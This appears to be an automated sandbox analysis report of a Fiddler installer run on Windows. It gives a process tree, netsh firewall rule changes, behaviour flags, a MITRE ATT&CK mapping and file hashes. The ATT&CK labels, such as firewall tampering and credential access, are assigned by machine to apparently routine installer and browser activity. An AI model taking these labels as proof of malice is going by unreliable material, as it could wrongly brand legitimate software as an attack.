- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3692 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4480 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4824 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2604 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5056 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:2204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5100 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5212 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:4324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5224 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:2800
- C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe
  "C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe"
  2⤵
  - Executes dropped EXE
  PID:4776
- - C:\Users\Admin\AppData\Local\Temp\nsyE55B.tmp\FiddlerSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\nsyE55B.tmp\FiddlerSetup.exe" /D=
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1316
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="FiddlerProxy"
      4⤵
      Modifies Windows Firewall
      PID:3676
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="FiddlerProxy" program="C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe" action=allow profile=any dir=in edge=deferuser protocol=tcp description="Permit inbound connections to Fiddler"
      4⤵
      Modifies Windows Firewall
      PID:748
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
      4⤵
      PID:3468
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:6124
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 1d8 -Pipe 2a0 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:5236
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 0 -NGENProcess 2ac -Pipe 2b4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:936
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 2b0 -Pipe 29c -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:3600
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 2d8 -Pipe 270 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:5320
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 27c -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:3588
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 2dc -Pipe 2b8 -Comment "NGen Worker Process"
        5⤵
        
        PID:3612
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2dc -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:2904
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2c8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4816
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 2d4 -Pipe 2e8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:2160
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\EnableLoopback.exe"
      4⤵
      PID:3360
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e8 -Comment "NGen Worker Process"
        5⤵
        
        PID:3764
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 294 -Pipe 27c -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2808
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 0 -NGENProcess 2a0 -Pipe 2a8 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1288
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 0 -NGENProcess 2dc -Pipe 2d4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1852
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 0 -NGENProcess 2dc -Pipe 1e4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5240
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 1ec -Pipe 278 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5524
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 0 -NGENProcess 2e8 -Pipe 2d0 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5832
  - - C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper
      "C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper" /a "C:\Users\Admin\AppData\Local\Programs\Fiddler"
      4⤵
      Executes dropped EXE
      PID:4944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Fiddler2FirstRun
      4⤵
      PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=1320 /prefetch:8
1⤵
PID:2256

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=756,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4716 /prefetch:1
1⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4020,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:1
1⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5276,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:1
1⤵
PID:1872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5304,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8
1⤵
PID:4208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5344,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5648 /prefetch:8
1⤵
PID:5068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5916,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:1
1⤵
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5484,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:8
1⤵
PID:5604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6244,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:1
1⤵
PID:5616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6540,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:1
1⤵
PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x2dc,0x7ffcb30dceb8,0x7ffcb30dcec4,0x7ffcb30dced0
  2⤵
  PID:5628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2632,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=2624 /prefetch:2
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1788,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:3
  2⤵
  PID:5972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:8
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=4160,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=4648,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=4680 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4688,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4276,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5104,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3384,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:1
  2⤵
  PID:5300
- C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5776,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5780,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3104,i,11611140782837908096,6386743873007892272,262144 --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:8
  2⤵
  PID:5784

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
1⤵
PID:5960

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3428

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5652

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5700

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2028

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
ed25c7f5a5d34ec1bf4125e75860e76d

SHA1
78b43f26d6efacdf06ac0469deb200576e3e8b15

SHA256
8db6989c35d744ebdb963b1f990972ac25d7d246f0ee81cd08b94915bffa0b6f

SHA512
5bd1cab3a9f78d7f12ee088361b5f8a18ac9fdd2582e6e9be455257d1ebca142681047e0af0b5631e43263b15cb9323bf208aaee1bb485d21967274ada2f5af2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
fc40b3cf22df9d119105949bef74598c

SHA1
71917fa7c2c22f3d10513f64bedab358ff7b739f

SHA256
0fd26d3e66475bf2f9b9d4f5f902cf5f4e0d5c86a7eacb7db8205ed9cd7fde49

SHA512
00d502470d50184e89031fa95358b410a0893ea8eaa4580172c08a8dabc208bba2655df5e4a06e724278697b960a9584bf26ace439b6b15cf2449eabfca7ede2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
90620212db7c7c8c63d074a71391b837

SHA1
f260aa1557f93a67dd34e411ab5bc9480eef1763

SHA256
e6db7d00145b4344b7394f81980f789b6e9920ed76d2cd895bf059bf5b7ded43

SHA512
ac531bc2753af0c1b36f2406c18e01d7088e80324b50a7cccdecc563f88cb1b52bad35dc306de1df372b59496f603d32a4171994a126a07c85c43ae54e796875

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
461d2e6d5294aacf86bc20d99001d948

SHA1
6a888cb5e88e1de954885f5bb08d63e8b4436466

SHA256
f30cafcf6f274cf70ed3d58d4dfbbffb5636ba49a4a5d6fbf6104a93b8d44942

SHA512
9b76c07d48688b6fb3e4fe7248297c059926cc9c3f4ab303e8fd9671f323ce2affac61b0200669e9ba20135f367e6e51192d41c1a87237d0d14d9bad3094fc20

